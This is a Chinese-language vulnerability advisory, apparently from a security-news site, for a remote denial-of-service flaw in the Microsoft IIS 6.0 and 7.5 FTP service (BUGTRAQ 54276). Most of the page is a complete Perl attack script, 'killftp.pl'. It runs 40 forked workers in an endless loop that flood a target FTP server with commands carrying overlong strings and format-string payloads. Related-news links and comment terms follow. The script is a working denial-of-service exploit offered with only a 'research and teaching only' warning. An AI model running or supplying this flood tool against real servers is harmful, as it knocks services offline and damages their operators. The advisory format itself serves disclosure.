发布日期:2012-07-03
更新日期:2012-07-04受影响系统:
Microsoft IIS 7.5
Microsoft IIS 6.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54276Internet Information Services(IIS,互联网信息服务)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。Microsoft IIS 6.0和7.5在实现上存在远程安全漏洞,攻击者可利用此漏洞造成受影响应用不响应。<*来源:coolkaveh
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!coolkaveh ()提供了如下测试方法:
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
print "Please DISABLE firewall daemon of this operating system first!
";
print "FTP Server Remote Denial Of Service
";
print "by coolkaveh
";
print "usage: perl killftp.pl <host>
";
print "example: perl killftp.pl www.example.com
"; } $host=shift; $port=shift || "21"; if(!defined($host)){
print "Please DISABLE firewall daemon of this operating system first!
";
print "FTP Server Remote Denial Of Service
";
print "by coolkaveh
";
print "coolkaveh@rocketmail.com
";
print "usage: perl killftp.pl <host>
";
print "example: perl killftp.pl www.example.com
";
exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
print "$host -> $port is alive.
";
$check_first->close;
}
else{
die("$host -> $port is closed!
");
}
@junk=("A"x5,"A"x17,"A"x33,"A"x65,"A"x76,"A"x129,"A"x257,"A"x513,"A"x1024,"A"x2049,"A"x4097,"A"x8193,
"A"x12288,"%s%p%x%d","024d","%.2049d","%p%p%p%p","%x%x%x%x","%d%d%d%d","%s%s%s%s","%99999999999s",
"%08x","%%20d","%%20n","%%20x","%%20s","%s%s%s%s%s%s%s%s%s%s","%p%p%p%p%p%p%p%p%p%p",
"%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%","%s"x129,"%x"x257,"-1","0","0x100",
"0x1000","0x3fffffff","0x7ffffffe","0x7fffffff","0x80000000","0xfffffffe","0xffffffff","0x10000","0x100000","1",
);
@command=(
"NLST","CWD","STOR","RETR",
"MKD","RMD","DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP","MODE",
"APPE","STRU","SITE","SITE INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD", "RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT",
"HELP","MODE","APPE","STRU","SITE","SITE INDEX", "TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM",
"SIZE","STAT","ACCT", "HELP","MODE","APPE","STRU","SITE","SITE
INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I", "NLST","CWD","STOR","RETR","MKD","RMD",
"DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP","MODE","APPE",
"STRU","SITE","SITE INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD","STOR","RETR","MKD","RMD","DELE",
"RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP","MODE","APPE","STRU","SITE","SITE
INDEX","TYPE","TYPE A","TYPE E",
"TYPE L","TYPE I","NLST","CWD","STOR","RETR","MKD","RMD",
"DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP",
"MODE","APPE","STRU","SITE","SITE INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT",
"HELP","MODE","APPE","STRU","SITE","SITE INDEX","TYPE","TYPE A", "TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT",
"HELP","MODE","APPE","STRU","SITE","SITE INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP","HELP","MODE","APPE","STRU","SITE","SITE
INDEX","TYPE",
"MODE","APPE","STRU","SITE","SITE INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP","MODE","APPE","STRU","SITE","SITE
INDEX","TYPE","TYPE A","TYPE E",
"TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP",
"MODE","APPE","STRU","SITE","SITE INDEX","TYPE","TYPE A","TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR","RNTO","LIST","MDTM","SIZE","STAT","ACCT","HELP","MODE","APPE","STRU","SITE","SITE
INDEX","TYPE","TYPE A",
"TYPE E","TYPE L","TYPE I","NLST","CWD", "STOR","RETR","MKD","RMD", "DELE","RNFR", "RNTO","LIST","MDTM","SIZE","REST"
);
print "Dosing Server!
";
$pm = new Parallel::ForkManager(40);
while (1) {
my $pid = $pm->start and next;
COMMAND_LIST: foreach $cmd (@command){
foreach $poc (@junk){
LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>"tcp", Timeout=>30);
if(defined($sock4)){
$sock4->send("$cmd"." "."$poc
", 0);
$sock4->recv($content, 0, 900);
}
}
}
$pm->finish;
}建议:
--------------------------------------------------------------------------------
厂商补丁:Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.microsoft.com/technet/security/Magix CMS "upload.php"任意文件上传漏洞OpenStack Nova内存破坏漏洞相关资讯 拒绝服务漏洞
- 数字签名拒绝服务漏洞(CVE-2013- (11/13/2013 12:25:03)
- Intel 82574L Gigabit Ethernet (03/01/2013 21:09:03)
- Wireshark DTN Dissector 拒绝服务 (02/03/2013 10:37:43)
| - Rockwell Automation FactoryTalk (04/10/2013 09:08:12)
- IBM WebSphere Message Broker多个 (03/01/2013 21:04:45)
- HP XP P9000 Command View (02/03/2013 10:36:32)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已???阅读并接受上述条款
|
|
易网时代-编程资源站